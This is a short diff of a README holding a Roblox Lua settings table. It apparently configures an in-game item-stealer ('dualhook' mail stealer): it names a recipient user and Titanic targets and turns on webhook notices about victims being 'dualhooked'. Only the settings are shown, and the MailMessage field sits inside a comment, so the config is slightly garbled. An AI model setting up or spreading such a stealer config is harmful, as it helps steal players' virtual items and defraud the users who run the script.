robloxdeveloper12/testingggg/README.md

 getgenv().Settings = {
     User = "larpedyourhuges",
-    Webhook = false, -- if you made it true they will receive dualhooked and undualhooked notifs to their webhook MailMessage = ".gg/fatalcm",
+    Webhook = true, -- if you made it true they will receive dualhooked and undualhooked notifs to their webhook MailMessage = ".gg/fatalcm",
     Titanics = {
         Dualhook = true,